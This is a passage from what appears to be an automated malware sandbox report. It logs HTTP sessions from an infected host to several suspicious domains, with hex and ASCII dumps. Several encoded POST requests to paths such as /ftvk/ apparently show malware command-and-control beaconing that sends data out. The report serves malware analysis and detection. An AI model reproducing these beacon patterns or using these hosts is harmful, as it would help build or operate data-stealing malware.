                                                                                Data Ascii: eOcujQ<pUr,R$jum.kYpig1lB*i``_Sj?<RA9+nKk>7Tof[R}\{Z^d6o%=Y7Y"{T%L|M_xsBfi[M7!Ro.wUf\KfQZ:W4GyKpYIDVdEyoe!
                                                                                Nov 25, 2024 12:01:34.873054981 CET1289INData Raw: 64 15 f8 37 e6 35 10 01 94 3b 51 a6 3f 80 2e 6c 3e 3f 04 39 95 86 38 6c 47 43 68 10 0c 67 00 a1 0c 90 6e 90 5e 81 b0 0b db 32 06 11 1b f3 23 2d fc 61 80 d0 8c 50 14 e9 17 ca 2a b4 55 96 51 f4 24 90 6a f8 a1 d0 0f 22 c6 fc 10 95 82 24 03 1f 04 c2
                                                                                Data Ascii: d75;Q?.l>?98lGChgn^2#-aP*UQ$j"$5Fz[EKPAFd(Z"je4hPFR0EHQ~THP#BaLQ!J~x|"?j4:Tx=<fu(Q:b<!T
                                                                                Nov 25, 2024 12:01:34.873244047 CET1289INData Raw: f0 f1 b2 58 2b a4 ef 36 5f 25 4f b8 44 08 17 47 3b 29 1f 85 9f 39 ca e5 72 b6 50 ea 64 66 ca d5 3a ca 47 95 5d be 83 f2 b2 2e 1f 35 a6 fc d9 fb bc 46 d8 4b 28 df 2d ec 9f 43 9f 3f b3 b4 7f 39 7d 5e d4 fb 91 7a be 61 d4 cd aa 08 a6 28 86 eb 86 02
                                                                                Data Ascii: X+6_%ODG;)9rPdf:G].5FK(-C?9}^za(X|//%cU;Fc0X|S:#/ADJF2E55HFp]"'3{/{YiDLhC@P3IKKnLSJ(or>6+Jb'hgJ6
                                                                                Nov 25, 2024 12:01:34.873255014 CET1289INData Raw: a1 01 f4 33 92 eb a2 58 cb 89 54 6b fb 0a 75 ae d3 f3 f6 4e a9 48 6b ac 12 5d 26 d0 4f 27 cf a1 2d 27 2a 82 42 8e ec 57 08 f4 a8 8d 40 0f 8f 2f d0 f2 98 4a 34 38 6d 20 5d 44 5c a0 b9 c4 c2 19 8d 88 32 87 bb a1 2a 8f 35 79 4a 91 ef 29 e9 a1 12 4f
                                                                                Data Ascii: 3XTkuNHk]&O'-'*BW@/J48m ]D\2*5yJ)OF9Wv&('bO]c^@e0q7<eD-^QA3]c^8ZU3OHC=|LG!,@S%Ux0P-IS-c:S@p$Ee


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                62192.168.11.204980531.31.196.17780
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:37.366810083 CET458OUTGET /sr6d/?2WLcH=1SpMEcLzJ9Sn7Ad5q3DkRiZVN2jVBq+dlMgZT/nq/UyfSDPywFazxbh+/qzvL+EnIyZaTvIKZcPRrxMSWCBfdTtLgScf+bZOQub9cvrYC+7J/tJ5pDuOaT0=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:01:37.597584963 CET1289INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:01:37 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Data Raw: 66 65 62 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 31 39 34 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a [TRUNCATED]
                                                                                Data Ascii: feb1<!doctype html><html lang="ru" class="is_adaptive" data-panel-url="https://server194.hosting.reg.ru/manager"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title> &nbsp;</title><style media="all">/*!*************************************************************************************************************************************************************************************************!*\ !*** css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_modules/less-loader/dist/cjs.js!./bem/blocks.adaptive/b-page/b-page.less ***! \*************************************************************************************************************************************************************************************************/.b-page{display:flex;flex-direction:column;width:100%;min-width:320px;height:100%;padding:57p [TRUNCATED]
                                                                                Nov 25, 2024 12:01:37.597682953 CET1289INData Raw: 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69
                                                                                Data Ascii: -serif;background:#fff;-webkit-tap-highlight-color:transparent}html:not(.is_adaptive) .b-page{overflow-x:hidden}@media (min-width:1024px){.is_adaptive .b-page{overflow-x:hidden}}.b-page_type_parking{min-height:100vh}.b-page_type_error-page{pad
                                                                                Nov 25, 2024 12:01:37.597696066 CET1289INData Raw: 6f 63 6b 7d 2e 62 2d 70 61 67 65 5f 5f 66 6f 6f 74 65 72 2d 64 6f 77 6e 7b 66 6c 65 78 3a 31 20 30 20 61 75 74 6f 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 69 65 20 2e 62 2d 70 61 67 65 5f 5f 66 6f 6f 74 65 72 2d 64 6f 77 6e 7b 6d 69
                                                                                Data Ascii: ock}.b-page__footer-down{flex:1 0 auto;overflow:hidden}.ie .b-page__footer-down{min-height:100%}@media (min-width:1024px){.is_adaptive .b-page__footer-down{overflow:visible}}.b-page__footer-down_overflow_visible{overflow:visible}.b-page__foote
                                                                                Nov 25, 2024 12:01:37.597815990 CET1289INData Raw: 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 66 34 66 39 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 70 61 67 65 5f 5f 61 64 64 69 74 69 6f 6e 2d 77 72 61
                                                                                Data Ascii: px;padding:0;background-color:#f2f4f9}html:not(.is_adaptive) .b-page__addition-wrapper{min-width:996px}@media (min-width:1024px){.is_adaptive .b-page__addition-wrapper{min-width:996px}}.b-page__addition-title{float:left;font:700 20px/30px Inte
                                                                                Nov 25, 2024 12:01:37.598032951 CET1289INData Raw: 66 6c 6f 77 5f 76 69 73 69 62 6c 65 2c 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 70 61 67 65 5f 6f 76 65 72 66 6c 6f 77 5f 76 69 73 69 62 6c 65 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 40 6d 65 64
                                                                                Data Ascii: flow_visible,html:not(.is_adaptive) .b-page_overflow_visible{overflow:visible}@media (min-width:1024px){.is_adaptive .b-page_overflow_visible{overflow:visible}}/*!*******************************************************************************
                                                                                Nov 25, 2024 12:01:37.598045111 CET1289INData Raw: 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 68 75 67 65 2d 63 6f 6d 70 61 63 74 2e
                                                                                Data Ascii: a Neue,Helvetica,FreeSans,sans-serif;margin-bottom:60px}.b-text_size_huge-compact.b-text_margin_top,.b-text_size_huge.b-text_margin_top{margin-top:60px}.b-text_size_huge-compact{font:48px/54px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans
                                                                                Nov 25, 2024 12:01:37.598331928 CET1289INData Raw: 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 34 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6e 6f 72 6d
                                                                                Data Ascii: ,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:24px}.b-text_size_normal-compact.b-text_margin_top,.b-text_size_normal.b-text_margin_top{margin-top:24px}.b-text_size_normal-compact{font:15px/18px Inter,Arial,Helvetica Neue,Helvetic
                                                                                Nov 25, 2024 12:01:37.598345995 CET1289INData Raw: 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 2c 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 68 75 67 65 5c 40 64 65 73 6b 74 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67
                                                                                Data Ascii: op.b-text_margin_top,html:not(.is_adaptive) .b-text_size_huge\@desktop.b-text_margin_top{margin-top:60px}html:not(.is_adaptive) .b-text_size_huge-compact\@desktop{font:48px/54px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-b
                                                                                Nov 25, 2024 12:01:37.598532915 CET1289INData Raw: 6f 6d 3a 33 30 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6d 65 64 69 75 6d 2d 63 6f 6d 70 61 63 74 5c 40 64 65 73 6b 74 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f
                                                                                Data Ascii: om:30px}html:not(.is_adaptive) .b-text_size_medium-compact\@desktop.b-text_margin_top,html:not(.is_adaptive) .b-text_size_medium\@desktop.b-text_margin_top{margin-top:30px}html:not(.is_adaptive) .b-text_size_medium-compact\@desktop{font:20px/2
                                                                                Nov 25, 2024 12:01:37.598543882 CET1289INData Raw: 72 67 69 6e 3a 30 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 67 69 61 6e 74 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 37 32 70
                                                                                Data Ascii: rgin:0}@media (min-width:1024px){.is_adaptive .b-text_size_giant\@desktop{font:72px/84px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}.is_adaptive .b-text_size_giant-compact\@desktop.b-text_margin_top,.is_adaptiv
                                                                                Nov 25, 2024 12:01:37.810506105 CET1289INData Raw: 6c 61 72 67 65 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 32 34 70 78 2f 33 36 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73
                                                                                Data Ascii: large\@desktop{font:24px/36px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}.is_adaptive .b-text_size_large-compact\@desktop.b-text_margin_top,.is_adaptive .b-text_size_large\@desktop.b-text_margin_top{margin-top:


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                63192.168.11.2049806208.91.197.2780
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:51.768299103 CET736OUTPOST /ftvk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Origin: http://www.614genetics.online
                                                                                Referer: http://www.614genetics.online/ftvk/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4c 47 5a 76 57 4d 71 34 54 75 4c 66 74 45 57 78 56 50 50 79 48 6d 6f 41 64 36 34 4e 38 6f 62 74 67 58 2b 72 2b 74 5a 58 35 75 77 61 5a 4f 4b 59 70 41 61 76 38 6d 4e 4e 70 67 59 6b 35 45 37 57 33 77 5a 77 6b 49 74 44 46 33 6c 6d 67 4e 39 7a 6b 31 47 31 2b 7a 74 6e 47 38 52 67 73 39 71 65 54 70 68 76 39 33 59 51 31 53 69 65 7a 37 44 2f 77 73 56 70 6f 38 77 58 51 46 4f 54 4a 65 46 59 6b 56 69 46 46 6c 4e 46 69 36 4d 4a 30 5a 6d 58 77 63 67 77 7a 61 2b 65 6f 33 49 36 61 49 6e 55 39 62 4f 61 73 77 43 4a 71 7a 78 73 50 37 75 42 49 53 4e 74 49 32 66 54 6e 71 51 55 56 41 73 4c 71 41 3d 3d
                                                                                Data Ascii: 2WLcH=LGZvWMq4TuLftEWxVPPyHmoAd64N8obtgX+r+tZX5uwaZOKYpAav8mNNpgYk5E7W3wZwkItDF3lmgN9zk1G1+ztnG8Rgs9qeTphv93YQ1Siez7D/wsVpo8wXQFOTJeFYkViFFlNFi6MJ0ZmXwcgwza+eo3I6aInU9bOaswCJqzxsP7uBISNtI2fTnqQUVAsLqA==


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                64192.168.11.2049807208.91.197.2780
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:54.424179077 CET756OUTPOST /ftvk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Origin: http://www.614genetics.online
                                                                                Referer: http://www.614genetics.online/ftvk/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4c 47 5a 76 57 4d 71 34 54 75 4c 66 73 6c 6d 78 5a 4f 50 79 57 57 6f 44 52 61 34 4e 6e 59 62 70 67 58 69 72 2b 73 4e 39 36 64 55 61 5a 75 36 59 6f 42 61 76 73 32 4e 4e 6a 41 59 72 6d 55 37 52 33 77 56 34 6b 4d 74 44 46 30 5a 6d 67 49 42 7a 6b 6d 75 30 78 44 74 6c 4f 63 52 69 69 64 71 65 54 70 68 76 39 32 38 36 31 53 4b 65 7a 4c 7a 2f 69 39 56 6f 68 63 77 59 54 46 4f 54 59 75 45 52 6b 56 69 37 46 6b 52 37 69 38 51 4a 30 64 69 58 77 70 4d 2f 36 61 2b 69 77 58 49 73 63 71 4c 61 6b 76 48 6d 6d 77 47 79 6a 7a 78 6b 44 4e 6a 62 56 67 35 4a 4c 6c 44 68 6a 61 70 38 58 43 74 51 33 4e 71 61 6d 69 79 59 56 69 68 6f 46 43 6d 78 36 48 70 33 75 6a 38 3d
                                                                                Data Ascii: 2WLcH=LGZvWMq4TuLfslmxZOPyWWoDRa4NnYbpgXir+sN96dUaZu6YoBavs2NNjAYrmU7R3wV4kMtDF0ZmgIBzkmu0xDtlOcRiidqeTphv92861SKezLz/i9VohcwYTFOTYuERkVi7FkR7i8QJ0diXwpM/6a+iwXIscqLakvHmmwGyjzxkDNjbVg5JLlDhjap8XCtQ3NqamiyYVihoFCmx6Hp3uj8=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                65192.168.11.2049808208.91.197.2780
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:57.079617977 CET2440OUTPOST /ftvk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Origin: http://www.614genetics.online
                                                                                Referer: http://www.614genetics.online/ftvk/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4c 47 5a 76 57 4d 71 34 54 75 4c 66 73 6c 6d 78 5a 4f 50 79 57 57 6f 44 52 61 34 4e 6e 59 62 70 67 58 69 72 2b 73 4e 39 36 64 63 61 5a 39 79 59 75 69 79 76 76 32 4e 4e 76 67 59 2f 6d 55 37 4d 33 7a 6c 38 6b 4d 6f 32 46 78 64 6d 68 71 35 7a 7a 48 75 30 6d 7a 74 6c 43 38 52 68 73 39 72 61 54 71 5a 56 39 33 4d 36 31 53 4b 65 7a 4a 62 2f 79 63 56 6f 6a 63 77 58 51 46 4f 66 4a 65 45 35 6b 56 37 41 46 6b 56 72 69 4b 67 4a 30 39 79 58 6a 76 59 2f 6d 4b 2b 61 6c 58 4a 76 63 71 47 59 6b 76 79 64 6d 77 79 55 6a 79 35 6b 54 72 43 48 48 41 49 51 56 56 2f 78 68 5a 51 66 5a 68 31 79 2f 64 53 2b 68 77 72 32 55 6e 35 6d 4f 6a 50 38 2f 45 70 41 38 30 36 5a 39 6a 62 56 63 34 76 4b 6f 78 70 4e 51 30 51 6b 59 71 49 61 53 6d 4d 59 4e 6e 46 33 71 35 4f 67 33 6f 75 7a 2f 59 6e 77 30 78 2f 30 66 35 32 4b 46 69 54 68 36 4c 66 6c 39 54 51 61 76 77 70 45 73 55 74 6d 62 78 79 44 43 55 76 4e 46 46 74 43 49 56 4a 47 2b 4f 39 4f 62 6f 75 57 6f 30 48 78 46 51 39 63 71 65 46 45 36 79 74 41 50 62 6e 4a 4f 58 32 68 [TRUNCATED]
                                                                                Data Ascii: 2WLcH=LGZvWMq4TuLfslmxZOPyWWoDRa4NnYbpgXir+sN96dcaZ9yYuiyvv2NNvgY/mU7M3zl8kMo2Fxdmhq5zzHu0mztlC8Rhs9raTqZV93M61SKezJb/ycVojcwXQFOfJeE5kV7AFkVriKgJ09yXjvY/mK+alXJvcqGYkvydmwyUjy5kTrCHHAIQVV/xhZQfZh1y/dS+hwr2Un5mOjP8/EpA806Z9jbVc4vKoxpNQ0QkYqIaSmMYNnF3q5Og3ouz/Ynw0x/0f52KFiTh6Lfl9TQavwpEsUtmbxyDCUvNFFtCIVJG+O9ObouWo0HxFQ9cqeFE6ytAPbnJOX2h9d0vFAMw/A9thUtqdoRTm7O8L5e23GSvuWQzbEOAmhu+yvvCXztQnrLnu5yJJCCjOExn4HZ8bF7Umr0BnjfvMBYCwyY1RMUmCRCTwglqa5X6nb8YtycoWWEG7YD/cAOtTB+y+agGOct5TeOD+Tmu9FOjEpG1GWdCtfOrrVGbY8c5frhxlS0pFm3f6HYR0K8pTk9AIEHmPAlViRSpl8rpqgC8ZeUZ2rM8b2XoFshUva986Lxs3jxzjySiVIMpNg8AlpoPb/rI6WhZRUkHHPE8EUyuJC188Lwib/LMYgDMfoNmBMSZNIHkvuOBSvyYo9LZ6+a7a6pkSmM0m19oHitJZfg+pINQgHfGEZrbBua/xFRxbt8NZhE8kcJ5O7b+TaC6lL/zDBOeK7/KOUPlp5SPG5JJhrJ7I0TOXv8EvSXOQBsVh4HgAfn3LUgn2aW3LB3K64z74aCSoM3s5+S+Gx0PuRi2r5PryZ4fa6hD7I3fkRyF3r7WthT4exY6XwT9NJPjSX/9lPKodmTlk8caqw9sAfPOzQGEXLpLgUsv8+dDuzFvJj2rRm9JWDZ2KcEl1mGMdFc+r6gR/2W9LPI8aMohAL+wiVmQQsH77tumuo99MEboQlp1+tZ5HIj+JnRcBU8d80H+LrlNKyzV91+nlELlEeKku+VSECsLOZ [TRUNCATED]
                                                                                Nov 25, 2024 12:01:57.079689980 CET4880OUTData Raw: 47 68 6b 66 70 67 43 6d 52 66 2f 6a 54 45 67 58 33 56 39 58 62 43 4b 58 47 4f 73 58 6d 57 58 59 72 45 4d 2f 70 37 5a 52 46 62 38 74 62 62 4f 6d 41 61 76 70 66 55 50 70 79 4d 62 30 44 33 49 63 56 38 6b 49 34 4e 62 75 52 6f 4c 76 4e 70 6d 38 45 37
                                                                                Data Ascii: GhkfpgCmRf/jTEgX3V9XbCKXGOsXmWXYrEM/p7ZRFb8tbbOmAavpfUPpyMb0D3IcV8kI4NbuRoLvNpm8E70Lu3fvlTgs5bRdqK9B8fLzjcoI7fXuXJUJrR9o9g9pUyPpCgwdt9JKhQ3dKkcFBOI2k7CHQIxtHdG7vpWeMEjmM7ItS9A63LU3vUddqCf+Vilz3G4FjrxOO3DYosLrT27/lJEHIyb50ie8hCOJvxZGDbNOm39uibh
                                                                                Nov 25, 2024 12:01:57.079704046 CET585OUTData Raw: 30 75 61 55 65 71 49 2f 71 62 52 34 7a 65 4f 6e 74 31 4c 58 5a 67 63 49 31 45 74 51 43 4c 66 51 7a 42 4b 37 34 37 63 73 78 57 44 50 33 31 45 4e 32 4b 44 69 66 6a 35 2b 64 4a 73 59 42 4b 59 50 76 70 30 4c 6a 66 77 7a 76 51 4a 43 59 57 7a 38 49 41
                                                                                Data Ascii: 0uaUeqI/qbR4zeOnt1LXZgcI1EtQCLfQzBK747csxWDP31EN2KDifj5+dJsYBKYPvp0LjfwzvQJCYWz8IAERfp1q6kGQziotPDOfUL6cwlCQYkzuyiPKyp/5meYnaoo88csfMdWoo7cKwRsxHyz3xciBkRjyEUPzWrbAB//FxxrslBq5n9YXt82DIhPCxqSXlP3ZQV488NDhjL3udQz3aQ+LcDg7mtyaVRdytOsGIR+91HkFegx


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                66192.168.11.2049809208.91.197.2780
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:59.734838963 CET460OUTGET /ftvk/?2WLcH=GExPV6KtXOXigkukfMfleD4xRaYqvrj5rkn1yqQr0MAVEMidlCaC83oYsDNl6Uf72gZXo4lyCEReg4R57wnVyD0gHtEFldueDrd90mwd3SDfs8vpytBw7tE=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:02:00.202306032 CET993INHTTP/1.1 200 OK
                                                                                Date: Mon, 25 Nov 2024 11:01:59 GMT
                                                                                Server: Apache
                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                Set-Cookie: vsid=904vr480078119963051618; expires=Sat, 24-Nov-2029 11:01:59 GMT; Max-Age=157680000; path=/; domain=www.614genetics.online; HttpOnly
                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_nliGpZw9a+vIqQk4n24drIRSfnz0jpEWksgVyLyIjzGopdQ5VVlFzjjVjvjFilVa/OyByJmE9jiTLbFFlBmNAg==
                                                                                Content-Length: 2630
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Connection: close
                                                                                Nov 25, 2024 12:02:00.202317953 CET191INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56
                                                                                Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_nliGpZw9a+vIqQk4n24drI
                                                                                Nov 25, 2024 12:02:00.202414989 CET1220INData Raw: 52 53 66 6e 7a 30 6a 70 45 57 6b 73 67 56 79 4c 79 49 6a 7a 47 6f 70 64 51 35 56 56 6c 46 7a 6a 6a 56 6a 76 6a 46 69 6c 56 61 2f 4f 79 42 79 4a 6d 45 39 6a 69 54 4c 62 46 46 6c 42 6d 4e 41 67 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72
                                                                                Data Ascii: RSfnz0jpEWksgVyLyIjzGopdQ5VVlFzjjVjvjFilVa/OyByJmE9jiTLbFFlBmNAg=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.614genetics.online/px.js?ch=1"></script><script type="text/javascript"
                                                                                Nov 25, 2024 12:02:00.202429056 CET1219INData Raw: 20 2f 2a 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 7d 2a 2f 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74
                                                                                Data Ascii: /*body { overflow:hidden; }*/ </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Me


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                67192.168.11.20498108.210.46.2180
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:02:05.515039921 CET724OUTPOST /r45a/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Origin: http://www.prhmcjdz.tokyo
                                                                                Referer: http://www.prhmcjdz.tokyo/r45a/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
